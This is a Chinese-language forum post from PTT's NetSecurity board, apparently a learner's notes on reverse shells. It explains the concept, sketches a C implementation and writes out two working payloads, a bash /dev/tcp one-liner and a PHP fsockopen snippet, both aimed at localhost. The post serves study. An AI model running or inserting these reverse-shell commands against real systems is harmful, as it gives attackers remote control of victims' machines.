2017.W47 - Reverse Shell > 已知用火 ## 前言 ## 最近終於願意開始學習 Reverse Shell[0] 順便學習一下各種 reverse shell 的寫法 (不過還是有很多不會寫 QQ) 終於進化到已知用火的階段了 QQ ## 內容 ## Shell[1] 是介於作業系統跟使用者中間的一個介面程式 通常是命令式介面 (CLI)[2] 作業系統本身是不參與跟使用者的互動 Shell 本身可以做到很多系統底層的操作 以及呼叫外部程式、指令等 而 Web Shell 則是泛指透過 Web 介面 (BUI)[3] 一種操作方式 本身擁有的權限與網頁伺服器[4] 一致 在 Ubuntu 中就可能是 www-data 權限 正常來說 Remote Shell 的連線方式是透過使用者端 主動連線到伺服器 這種使用情境符合大多數的情況 但是在少數情況 (e.g. 駭客入侵) 的時候 會因為防火牆原則或在 NAT[5] 之後 所以無法主動連線到受害者機器 因此發展出 reverse shell 的概念 也就是受害者機器主動發出網路連線的一種技巧 概念上來說 被控制端需要 1)主動發出網路連線 與 2)產生一個互動式介面 用 C 語言當做例子 就是要分別 1) 建立一個 socket 連線與 2) 呼叫一個 /bin/sh 的程式 使用 socket(AF_INET, SOCK_STREAM, 0) 建立一個 TCP 連線是個簡單的方式 複雜的則可以實作 UDP / ICMP 等其他方式的網路連線 連線建立之後的 socket 就可以透過 dup2 將內容重導向到 stdin/stdout 接著執行 execv 來產生一個 bash shell 除了透過低階程式之外 也可以直接使用 bash / Linux 的特性直接產生一個 reverse shell 在 Linux 下直接對檔案 /dev/tcp/[IP]/[Port] [6] 做操作 這樣就可以直接對外產生一個網路連線 並傳送、接收指令 最後可以用以下指令快速產生一個 reverse shell /bin/bash -i >& /dev/tcp/127.0.0.1/34182 0>&1 相同的概念也可以透過 PHP 來實作 藉由 fsockopen [7] 快速產生一個 socket (並且預期 FD 是 3) 在用 exec 來執行跟 bash reverse shell 類似的指令 <?php $sk = fsockopen("127.0.0.1", 34182); exec("/bin/bash -i <&3 >&3 2>&3"); ?> [0]: https://stackoverflow.com/questions/35271850/what-is-reverse-shell [1]: https://zh.wikipedia.org/wiki/%E6%AE%BC%E5%B1%A4 [2]: https://en.wikipedia.org/wiki/Command-line_interface [3]: https://en.wikipedia.org/wiki/Browser_user_interface [4]: https://en.wikipedia.org/wiki/Web_server [5]: https://en.wikipedia.org/wiki/Network_address_translation [6]: http://www.tldp.org/LDP/abs/html/devref1.html [7]: http://php.net/manual/en/function.fsockopen.php -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 123.193.122.171 ※ 文章網址: https://www.ptt.cc/bbs/NetSecurity/M.1511274995.A.F8F.html ※ 編輯: CMJ0121 (123.193.122.171), 11/21/2017 22:37:04